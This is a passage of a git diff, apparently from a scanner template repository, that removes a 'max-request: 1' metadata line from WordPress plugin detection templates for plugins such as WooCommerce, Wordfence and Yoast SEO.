popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 982306b13c..96d8bd6aca 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: - max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index fdcac13b56..85955ac95e 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: - max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index fc316f9f7a..a81fc892ca 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: - max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index 975b63f5de..d9c6052cd7 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: - max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index 5065659e82..afc1141e0c 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: - max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index 732ffbc4eb..d44add9ca6 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: - max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 12dffeb534..20ba5c2e16 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: - max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index ae0e76c4bb..cbcf3cf09d 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: - max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index b1718d1ccb..3311d42c94 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: - max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 7543ac1d55..46c1c22805 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: - max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 4a29cecdb0..7c13b8d2a4 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: - max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index be281d91e6..53b30ba721 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: - max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 6bd95ec077..9555d7aebd 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: - max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 1fd64a5279..180266f448 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: - max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 1bb9a283ce..17584cd064 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: - max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 7836d9554c..015fb97043 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: - max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index ccd72e427a..1d5224b457 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: - max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index 3622b2c6b3..aafd6c6a38 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: - max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index 9eff765d61..e10ab985da 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: - max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index c856e1fa9e..9881b591ae 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: - max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 008440cc58..0480b4b0e6 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: - max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 410776862f..26d525386b 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: - max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index f210a2a2f9..3920c5cf56 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: - max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f1dd1bf150..f556786f5a 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: - max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index a9ec913599..844e3d19a0 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: - max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index d38aeb0279..eb0f02f602 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: - max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 07c43b9d80..755efd53fa 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: - max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 83a849e11e..0403bb4e72 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: - max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index c6100637d9..cd2632ea05 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: - max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index 1f188b66c6..b5f8b822c7 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: - max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 2c7b16cb44..85aaf7ff16 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: - max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml index 9d6afa8d3f..0af322b728 100644 --- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml +++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/ metadata: - max-request: 1 plugin_namespace: ultimate-addons-for-gutenberg wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml index 87721a245a..d4ac0d179e 100644 --- a/http/technologies/wordpress/plugins/under-construction-page.yaml +++ b/http/technologies/wordpress/plugins/under-construction-page.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/under-construction-page/ metadata: - max-request: 1 plugin_namespace: under-construction-page wpscan: https://wpscan.com/plugin/under-construction-page tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml index 45e0dead0e..dbbadf3cfc 100644 --- a/http/technologies/wordpress/plugins/updraftplus.yaml +++ b/http/technologies/wordpress/plugins/updraftplus.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/updraftplus/ metadata: - max-request: 1 plugin_namespace: updraftplus wpscan: https://wpscan.com/plugin/updraftplus tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml index abec174ec3..401b0e479f 100644 --- a/http/technologies/wordpress/plugins/use-any-font.yaml +++ b/http/technologies/wordpress/plugins/use-any-font.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/use-any-font/ metadata: - max-request: 1 plugin_namespace: use-any-font wpscan: https://wpscan.com/plugin/use-any-font tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml index e088ac07a6..6f95506748 100644 --- a/http/technologies/wordpress/plugins/user-role-editor.yaml +++ b/http/technologies/wordpress/plugins/user-role-editor.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/user-role-editor/ metadata: - max-request: 1 plugin_namespace: user-role-editor wpscan: https://wpscan.com/plugin/user-role-editor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml index 8b163200bf..4404f87aab 100644 --- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml +++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/velvet-blues-update-urls/ metadata: - max-request: 1 plugin_namespace: velvet-blues-update-urls wpscan: https://wpscan.com/plugin/velvet-blues-update-urls tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml index 2366a7dad7..8995434fce 100644 --- a/http/technologies/wordpress/plugins/w3-total-cache.yaml +++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/w3-total-cache/ metadata: - max-request: 1 plugin_namespace: w3-total-cache wpscan: https://wpscan.com/plugin/w3-total-cache tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml index 71448e61e8..8175806cb8 100644 --- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml +++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-converter-for-media/ metadata: - max-request: 1 plugin_namespace: webp-converter-for-media wpscan: https://wpscan.com/plugin/webp-converter-for-media tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml index 717554b89f..db82bc7f43 100644 --- a/http/technologies/wordpress/plugins/webp-express.yaml +++ b/http/technologies/wordpress/plugins/webp-express.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/webp-express/ metadata: - max-request: 1 plugin_namespace: webp-express wpscan: https://wpscan.com/plugin/webp-express tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml index fba5c8b09c..03ddae57bc 100644 --- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml +++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/widget-importer-exporter/ metadata: - max-request: 1 plugin_namespace: widget-importer-exporter wpscan: https://wpscan.com/plugin/widget-importer-exporter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml index 631202198e..d6449bb5bf 100644 --- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml +++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-cart-abandonment-recovery/ metadata: - max-request: 1 plugin_namespace: woo-cart-abandonment-recovery wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml index cc953078eb..2d5fdf1779 100644 --- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml +++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-checkout-field-editor-pro/ metadata: - max-request: 1 plugin_namespace: woo-checkout-field-editor-pro wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml index 97ce674116..6b5705e20d 100644 --- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml +++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woo-variation-swatches/ metadata: - max-request: 1 plugin_namespace: woo-variation-swatches wpscan: https://wpscan.com/plugin/woo-variation-swatches tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml index 6d05a6f058..dbcdb64bad 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-paypal-express-checkout wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml index baf5af3bb5..fb9ea502ce 100644 --- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-gateway-stripe/ metadata: - max-request: 1 plugin_namespace: woocommerce-gateway-stripe wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml index aa1898c4ba..48ffb25245 100644 --- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-payments wpscan: https://wpscan.com/plugin/woocommerce-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml index 5fae796fdd..4fa6fc3ffe 100644 --- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-paypal-payments/ metadata: - max-request: 1 plugin_namespace: woocommerce-paypal-payments wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml index 22f812e2b8..1c1c690fcd 100644 --- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/ metadata: - max-request: 1 plugin_namespace: woocommerce-pdf-invoices-packing-slips wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml index c637006d26..4d6702d81a 100644 --- a/http/technologies/wordpress/plugins/woocommerce-services.yaml +++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce-services/ metadata: - max-request: 1 plugin_namespace: woocommerce-services wpscan: https://wpscan.com/plugin/woocommerce-services tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml index e020507ccb..42cb8bc409 100644 --- a/http/technologies/wordpress/plugins/woocommerce.yaml +++ b/http/technologies/wordpress/plugins/woocommerce.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/woocommerce/ metadata: - max-request: 1 plugin_namespace: woocommerce wpscan: https://wpscan.com/plugin/woocommerce tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml index c92903fd79..55d6effbf5 100644 --- a/http/technologies/wordpress/plugins/wordfence.yaml +++ b/http/technologies/wordpress/plugins/wordfence.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordfence/ metadata: - max-request: 1 plugin_namespace: wordfence wpscan: https://wpscan.com/plugin/wordfence tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml index c25b2c1c48..6786cab703 100644 --- a/http/technologies/wordpress/plugins/wordpress-importer.yaml +++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-importer/ metadata: - max-request: 1 plugin_namespace: wordpress-importer wpscan: https://wpscan.com/plugin/wordpress-importer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml index 4d6dd14d25..784ba22c8a 100644 --- a/http/technologies/wordpress/plugins/wordpress-seo.yaml +++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/wordpress-seo/ metadata: - max-request: 1 plugin_namespace: wordpress-seo wpscan: https://wpscan.com/plugin/wordpress-seo tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml index 7ca0870ed6..72ff55e58a 100644 --- a/http/technologies/wordpress/plugins/worker.yaml +++ b/http/technologies/wordpress/plugins/worker.yaml @@ -7,7 +7,6 @@ info: reference: - https://wordpress.org/plugins/worker/ metadata: - max-request: 1 plugin_namespace: worker wpscan: https://wpscan.com/plugin/worker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml index 4f0d9be568..8cfaa0f5a9 100644 --- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml +++ 